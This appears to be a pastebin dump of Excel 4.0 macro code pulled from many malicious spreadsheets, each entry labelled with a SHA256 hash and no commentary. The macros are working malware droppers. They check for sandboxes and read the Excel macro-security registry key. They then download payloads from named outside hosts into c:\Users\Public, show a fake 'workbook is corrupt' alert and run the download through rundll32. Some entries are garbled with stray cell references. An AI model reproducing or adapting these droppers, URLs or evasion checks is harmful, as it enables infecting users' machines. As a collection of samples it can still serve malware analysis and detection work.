  694. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  695. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  696. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  697. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  698. =CLOSE(FALSE)
  699.  
  700. SHA256: 24940237fe63867d76bb6623119d9accf0154e3bb695eb39abb3db9d5dd1478f
  701.  
  702. SHA256: 249dc12dbaf933345e21e339ab247af3705205954cef78135486c50cd0da87a8
  703. 96eRQe3FI5
  704. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  705. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  706. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  707. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  708. =WAIT(NOW()+"00:00:03")
  709. =FOPEN("c:\users\public\1.reg")
  710. =FPOS(R[-1]C, 215)
  711. =FREAD(R[-2]C, 255)
  712. =FCLOSE(R[-3]C)
  713. =FILE.DELETE("c:\users\public\1.reg")
  714. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  715. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  716. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  717. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  718. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  719. =CLOSE(FALSE)
  720.  
  721. SHA256: 256bbe555af14dcfe138d8e6ee89bdc12b9e1b1174464697e939c62981876ff2
  722. rQtfOKkVai
  723. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  724. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  725. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  726. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  727. =WAIT(NOW()+"00:00:03")
  728. =FOPEN("c:\users\public\1.reg")
  729. =FPOS(R[-1]C, 215)
  730. =FREAD(R[-2]C, 255)
  731. =FCLOSE(R[-3]C)
  732. =FILE.DELETE("c:\users\public\1.reg")
  733. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  734. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\csg75ef.html",0,0)
  735. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
  736. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  737. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)
  738. =CLOSE(FALSE)
  739.  
  740. SHA256: 256fa7c39e92a9d5ca30cd499761986eebb5e4a76638000016a040addd1700b6
  741. Piq9dNgHYn
  742. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))A36A37A38A39A41A42
  743. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  744. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  745. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210
  746. =WAIT(NOW()+"00:00:03")
  747. =FOPEN("c:\users\public\1.reg")
  748. =FPOS(R[-1]C, 215)G20G21G22
  749. =FREAD(R[-2]C, 255)
  750. =FCLOSE(R[-I15]C)
  751. =FILE.DELETE("c:\users\public\1.reg")J39J41J42J43J44
  752. =IF(ISNUMBER(SEARCH("0001",R[-K37]C)),CLOSE(FALSE),)
  753. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://efbzfyvsb.website/f2f23","c:\Users\Public\b7gf5yk.html",0,0)L132L133L134L135L137L138L139
  754. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M114
  755. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5yk.html,DllRegisterServer",0,5)N149N150N151N152N153N154N155N156N157N158N159N160N161N162N163
  756. =CLOSE(FALSE)
  757.  
  758. SHA256: 25821076bde5f4075b4d0d791dfa5e97942b918032b95a22449795e1ae44c0fa
  759. lAWGm4uhiE
  760. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  761. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  762. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  763. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  764. =WAIT(NOW()+"00:00:03")
  765. =FOPEN("c:\users\public\1.reg")
  766. =FPOS(R[-1]C, 215)
  767. =FREAD(R[-2]C, 255)
  768. =FCLOSE(R[-3]C)
  769. =FILE.DELETE("c:\users\public\1.reg")
  770. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  771. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  772. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  773. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  774. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  775. =CLOSE(FALSE)
  776.  
  777. SHA256: 25c3c44e3eb700bc26528cd5518d10f3c0ce9bbca42e558455f56b3c743a47bc
  778. NsDpPc7D4T
  779. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  780. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  781. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  782. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  783. =WAIT(NOW()+"00:00:03")
  784. =FOPEN("c:\users\public\1.reg")
  785. =FPOS(R[-1]C, 215)
  786. =FREAD(R[-2]C, 255)
  787. =FCLOSE(R[-3]C)
  788. =FILE.DELETE("c:\users\public\1.reg")
  789. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  790. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\csg75ef.html",0,0)
  791. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
  792. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  793. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)
  794. =CLOSE(FALSE)
  795.  
  796. SHA256: 260a1586c3aeca77e50aa4d34e4b79a8d96e0df8079a6cabab94340b2db55c99
  797. eS2A4K5xgX
  798. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  799. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  800. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  801. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D184D185D186D187D188D189D190D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210D211
  802. =WAIT(NOW()+"00:00:03")
  803. =FOPEN("c:\users\public\1.reg")
  804. =FPOS(R[-1]C, 215)
  805. =FREAD(R[-2]C, 255)H21H22H24
  806. =FCLOSE(R[-3]C)
  807. =FILE.DELETE("c:\users\public\1.reg")
  808. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  809. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://greentec-automation.com/wp-cran.php","c:\Users\Public\cskc75ef.html",0,0)L124L125L126L127L129L130L131L132L133L134L136L137L138L139
  810. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://narensyndicate.com/wp-cran.php","c:\Users\Public\cskc7M1375ef.html",0,0),)
  811. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  812. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\cskc75ef.html,DllRegisterServer",0,5)O149O150O151O152O153O154O155O156O157O158O159O160O161O162O163O164
  813. =CLOSE(FALSE)
  814.  
  815. SHA256: 2672f0d5fea87c66056968b75cb7cbe1ab1385a3271742d4922bf3f2bf014a7c
  816. pOmAsNXIr5
  817. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  818. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  819. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  820. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  821. =WAIT(NOW()+"00:00:03")
  822. =FOPEN("c:\users\public\1.reg")
  823. =FPOS(R[-1]C, 215)
  824. =FREAD(R[-2]C, 255)
  825. =FCLOSE(R[-3]C)
  826. =FILE.DELETE("c:\users\public\1.reg")
  827. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  828. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\csg75ef.html",0,0)
  829. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
  830. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  831. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)
  832. =CLOSE(FALSE)
  833.  
  834. SHA256: 2aa9e690895bd08efe0bc1ea961e03f99fd366ac488464c1c7925523172cfaee
  835. MM9DzzSjc8
  836. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  837. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  838. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  839. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  840. =WAIT(NOW()+"00:00:03")
  841. =FOPEN("c:\users\public\1.reg")
  842. =FPOS(R[-1]C, 215)
  843. =FREAD(R[-2]C, 255)
  844. =FCLOSE(R[-3]C)
  845. =FILE.DELETE("c:\users\public\1.reg")
  846. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  847. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  848. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  849. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  850. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  851. =CLOSE(FALSE)
  852.  
  853. SHA256: 2d14c9fcf22fbd93fca401026579176f511a7aa88bb9826e22ef75a37f89d45a
  854. CYZyK6S7Yt
  855. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  856. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  857. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  858. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  859. =WAIT(NOW()+"00:00:03")
  860. =FOPEN("c:\users\public\1.reg")
  861. =FPOS(R[-1]C, 215)
  862. =FREAD(R[-2]C, 255)
  863. =FCLOSE(R[-3]C)
  864. =FILE.DELETE("c:\users\public\1.reg")
  865. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  866. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\csg75ef.html",0,0)
  867. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
  868. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  869. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)
  870. =CLOSE(FALSE)
  871.  
  872. SHA256: 2e07ec0a7f2338357785a19d9c9a50aec122628b1168873556b8e36fcd368c16
  873. yECF3Ak94w
  874. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  875. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))B36B37B39B40B41B42B43
  876. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  877. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D184D185D186D187D188D189D190D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210D211
  878. =WAIT(NOW()+"00:00:03")
  879. =FOPEN("c:\users\public\1.reg")
  880. =FPOS(R[-1]C, 215)
  881. =FREAD(R[-2]C, 255)H21H22H24
  882. =FCLOSE(R[-3]C)
  883. =FILE.DELETE("c:\users\public\1.reg")
  884. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  885. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://greentec-automation.com/wp-crun.php","c:\Users\Public\csg75ef.html",0,0)L124L125L126L127L129L130L131L132L133L134L136L137L138L139
  886. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://narensyndicate.com/wp-crun.php","c:\Users\Public\bwep5ef.html",0,0),)
  887. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)N115
  888. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)O149O150O151O152O153O154O155O156O157O158O159O160O161O162O163O164
  889. =CLOSE(FALSE)
  890.  
  891. SHA256: 2e0d33fc6ee66508b5e5c1e7886e498005a940fd10203e5c44606cf137060e91
  892. XzVSQSItQv
  893. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  894. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))B38B39B40B42B43
  895. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  896. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D190D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210D211
  897. =WAIT(NOW()+"00:00:03")
  898. =FOPEN("c:\users\public\1.reg")
  899. =FPOS(R[-1]C, 215)
  900. =FREAD(R[-2]C, 255)H19H20H22H23
  901. =FCLOSE(R[-3]C)
  902. =FILE.DELETE("c:\users\public\1.reg")
  903. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)K54K55K56K57K58K60K61
  904. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://fcowhcwsb.space/erg4ewr1","c:\Users\Public\b7gf5ef.html",0,0)
  905. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M115
  906. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5ef.html,DllRegisterServer",0,5)N150N151N152N153N154N155N156N157N158N159N160N161N162N163N164
  907. =CLOSE(FALSE)
  908.  
  909. SHA256: 2ee2221f65c537ed6e6c2ff760c010a68ae28bb6eb8e3133f263399a3e7626f2
  910. A55L5qvGJ1
  911. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))A36A37A38A39A41A42
  912. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  913. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  914. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210
  915. =WAIT(NOW()+"00:00:03")
  916. =FOPEN("c:\users\public\1.reg")
  917. =FPOS(R[-1]C, 215)G20G21G22
  918. =FREAD(R[-2]C, 255)
  919. =FCLOSE(R[-I15]C)
  920. =FILE.DELETE("c:\users\public\1.reg")J39J41J42J43J44
  921. =IF(ISNUMBER(SEARCH("0001",R[-K37]C)),CLOSE(FALSE),)
  922. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://efbzfyvsb.website/f2f23","c:\Users\Public\b7gf5yk.html",0,0)L132L133L134L135L137L138L139
  923. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M114
  924. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5yk.html,DllRegisterServer",0,5)N149N150N151N152N153N154N155N156N157N158N159N160N161N162N163
  925. =CLOSE(FALSE)
  926.  
  927. SHA256: 2f287a26eab4d96d6be641b9b622c03dc24e1e500d6edc7f1d76d2ac7229b47d
  928. 5ATqhg28tm
  929. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  930. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  931. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  932. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  933. =WAIT(NOW()+"00:00:03")
  934. =FOPEN("c:\users\public\1.reg")
  935. =FPOS(R[-1]C, 215)
  936. =FREAD(R[-2]C, 255)
  937. =FCLOSE(R[-3]C)
  938. =FILE.DELETE("c:\users\public\1.reg")
  939. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  940. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  941. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  942. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  943. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  944. =CLOSE(FALSE)
  945.  
  946. SHA256: 31d22dc2d95d1581210f46c52d21d22b04f660cc210160cafd38abd9fea0cc63
  947. dFDmxOMPYV
  948. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  949. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))B38B39B40B42B43
  950. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  951. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D190D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210D211
  952. =WAIT(NOW()+"00:00:03")
  953. =FOPEN("c:\users\public\1.reg")
  954. =FPOS(R[-1]C, 215)
  955. =FREAD(R[-2]C, 255)H19H20H22H23
  956. =FCLOSE(R[-3]C)
  957. =FILE.DELETE("c:\users\public\1.reg")
  958. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)K54K55K56K57K58K60K61
  959. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://fcowhcwsb.space/erg4ewr1","c:\Users\Public\b7gf5ef.html",0,0)
  960. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M115
  961. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5ef.html,DllRegisterServer",0,5)N150N151N152N153N154N155N156N157N158N159N160N161N162N163N164
  962. =CLOSE(FALSE)
  963.  
  964. SHA256: 341c8e54b1eb0d4d092825257143d28ebc8ab54587f650f5f4486494955bed7e
  965. jyHQWsnVnj
  966. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  967. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  968. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  969. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  970. =WAIT(NOW()+"00:00:03")
  971. =FOPEN("c:\users\public\1.reg")
  972. =FPOS(R[-1]C, 215)
  973. =FREAD(R[-2]C, 255)
  974. =FCLOSE(R[-3]C)
  975. =FILE.DELETE("c:\users\public\1.reg")
  976. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  977. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  978. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  979. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  980. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  981. =CLOSE(FALSE)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement